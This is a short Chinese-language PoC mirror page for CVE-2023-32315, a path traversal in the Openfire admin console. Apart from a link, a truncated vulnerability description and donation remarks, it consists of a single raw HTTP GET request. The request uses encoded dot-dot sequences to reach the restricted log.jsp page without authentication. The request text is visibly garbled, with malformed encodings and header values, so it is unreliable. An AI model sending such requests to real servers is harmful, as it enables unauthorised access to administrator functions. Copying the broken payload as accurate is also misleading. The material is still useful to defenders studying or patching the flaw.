CVE-2023-32315 PoC — Ignite Realtime Openfire 路径遍历漏洞

Source

https://github.com/ohnonoyesyes/CVE-2023-32315

Associated Vulnerability

Title:Ignite Realtime Openfire 路径遍历漏洞 (CVE-2023-32315)
Description:Ignite Realtime Openfire是Ignite Realtime社区的一款采用Java开发且基于XMPP（前称Jabber，即时通讯协议）的跨平台开源实时协作（RTC）服务器。它能够构建高效率的即时通信服务器，并支持上万并发用户数量。 Ignite Realtime Openfire 存在安全漏洞，该漏洞源于允许未经身份验证的用户在已配置的 Openfire 环境中使用未经身份验证的 Openfire 设置环境，以访问为管理用户保留的 Openfire 管理控制台中的受限页面，以下产品和版

Readme

# CVE-2023-32315

```
GET /setup/setup-s/%002e%002e/Su002esu002e/log.jsp HTTP/1.1
Host: 192.168.40.132:9090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; X64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept:
text/html,application/xhtml+ml,application/xml;q=0.9,image/avif,image/webp,image/apng ,*/*;9=0.8, application/signed-exchange;v=b3;9=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en; q=0.9
Connection: close


```

File Snapshot


 [4.0K]  /data/pocs/528773927827d1ac4741eef73d96579089747f9c
└── [ 500]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!